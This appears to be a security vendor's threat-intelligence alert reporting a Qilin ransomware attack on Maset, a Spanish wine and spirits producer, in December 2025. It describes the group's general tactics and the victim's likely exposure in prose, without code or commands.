Attack alert: qilin targets Maset - ES

Introduction

On December 4, 2025, Maset, a Spanish producer of premium wines and spirits founded in 1956, was the victim of a cyberattack orchestrated by the Qilin ransomware group. This breach, classified as SIGNAL level according to our XC classification, exposes a family-owned company with 50 to 100 employees and €25 million in annual revenue. The incident occurs amid a surge in attacks targeting the European agri-food sector, where sensitive customer data and critical production processes are prime targets for malicious actors. According to our verified data, this intrusion raises crucial questions about the protection of the digital infrastructure of Spanish SMEs in the Food & Beverage sector.

The attack against Maset illustrates the persistent vulnerability of mid-sized companies to sophisticated cybercriminal threats. Data certified on the Polygon blockchain reveals that this breach potentially affects the company's entire value chain, from customer information to the trade secrets of its premium spirits. The SIGNAL classification indicates a detected exposure requiring immediate vigilance, although the exact extent of the exfiltration is still being analyzed by our CTI teams.

Analyse détaillée

The Spanish wine and spirits sector, representing a major economic and cultural heritage, is facing increasing digitization of its operations. While this digital transformation improves operational efficiency, it simultaneously exposes critical assets to cyber threats. For Maset, whose business relies on the reputation and trust of international distributors, the consequences of such a breach extend far beyond the technical realm to affect the brand itself.

Analysis of the extracted metadata suggests that Qilin strategically targeted a company with a broad attack surface, combining industrial production systems, customer databases, and logistics networks. This multi-vector approach characterizes the evolving modus operandi of the cybercriminal collective, which has been active for several years on the international ransomware-as-a-service scene.

Qilin, also known as Agenda, represents one of the most sophisticated ransomware threats currently operating according to a Ransomware-as-a-Service (RaaS) model. This cybercriminal collective, active since 2022, has distinguished itself by its ability to compromise organizations of varying sizes across Europe and North America. Their decentralized infrastructure allows affiliates to rent out their malicious tools in exchange for a commission on the ransoms obtained, thus multiplying their operational reach.

Qilin's modus operandi relies on a particularly formidable double extortion approach. The attackers do not simply encrypt their victims' data; they also exfiltrate significant volumes of sensitive information beforehand. This strategy allows them to exert maximum pressure by threatening to publish the stolen data on their dedicated leak site, even if the decryption ransom is paid. Review of files compromised in previous incidents shows a marked preference for high-value data: intellectual property, financial information, customer data, and strategic internal communications.

Qilin's preferred intrusion techniques include exploiting unpatched vulnerabilities in internet-exposed systems, particularly VPN servers and remote desktop solutions. Our analysis also reveals the frequent use of targeted phishing campaigns against employees with high privileges. Once initial access is gained, the group deploys sophisticated network reconnaissance tools to map the infrastructure before proceeding with exfiltration and encryption.

Notable victims of Qilin include manufacturing companies, healthcare facilities, and professional services firms in Europe and North America. The collective has demonstrated a remarkable capacity for adaptation, adjusting its tactics according to the defenses encountered. Their RaaS platform attracts technically skilled affiliates, which explains the variability observed in the initial attack vectors from one compromise to another.

The group's persistence on compromised systems relies on the installation of multiple backdoors and the use of legitimate tools hijacked from the outside (living-off-the-land), making detection particularly complex. This stealthy approach often allows attackers to maintain access for several weeks before triggering encryption, thus maximizing the volume of exfiltrated data and the chances of success for their extortion campaign.

Maset has embodied Catalan winemaking excellence since its founding in 1956. Based in the Penedès region, this producer of premium wines and spirits has forged an international reputation thanks to its top-quality cavas and sparkling wines. With an estimated workforce of 50 to 100 employees, the family-owned company generates annual revenue of approximately €25 million, reflecting its premium positioning in European and international markets.

Maset's business revolves around artisanal production processes combined with modern winemaking and aging technologies. This duality necessitates a digital infrastructure that simultaneously manages the industrial control systems of the wineries, customer databases for direct sales, and B2B networks with international distributors. The progressive digitalization of these operations has created a large attack surface, particularly vulnerable to targeted intrusions such as the one orchestrated by Qilin in early December 2025.

Maset's supply chain extends across Europe and beyond, requiring complex digital coordination between vineyards, production facilities, warehouses, and business partners. While this interconnectedness optimizes operational efficiency, it exposes the company to the risk of lateral spread in the event of an initial breach. Customer data accumulated over decades, including order information, purchasing preferences, and contact details, constitutes a particularly sensitive asset with regard to the GDPR.

Maset's premium positioning relies heavily on the trust and brand reputation built over nearly seven decades. In the wine industry, where image and authenticity are paramount, a cyberattack revealing security vulnerabilities can have a disproportionate impact on customer perception. International distributors and high-end consumers expect high standards not only in product quality but also in the protection of their personal and business data.

Maset's geographic location in Catalonia, a strategic wine region in Spain, places the company at the heart of a dense agri-food ecosystem where digital interconnections between producers, cooperatives, and distributors create systemic dependencies. A compromise at Maset could potentially affect its business partners if attackers exploit established trust relationships to conduct chain attacks.

The SIGNAL classification assigned to this attack indicates a detected exposure requiring immediate attention, without widespread public confirmation of a large-scale data breach. Based on our XC-Classify methodology, this level suggests that qilin likely exfiltrated sensitive information from Maset, but the exact scope and precise nature of the compromised data are still being assessed by our CTI analysts.

Data certified on the Polygon blockchain reveals that the incident was detected on December 4, 2025, marking the start of the critical analysis window. In typical qilin attack scenarios, the initial intrusion vector often exploits unpatched vulnerabilities in internet-exposed systems or phishing campaigns targeting employees with administrative privileges. For a company the size of Maset, potential entry points include email servers, outdated VPN solutions, and the management interfaces of connected winery production systems.

Conclusion

A review of metadata suggests that the attackers likely maintained a stealthy presence within Maset's infrastructure for several days, or even weeks, before the extortion phase began. This reconnaissance period allows Qilin affiliates to map the network, identify high-value data, and establish persistence mechanisms that ensure continued access even in the event of partial detection.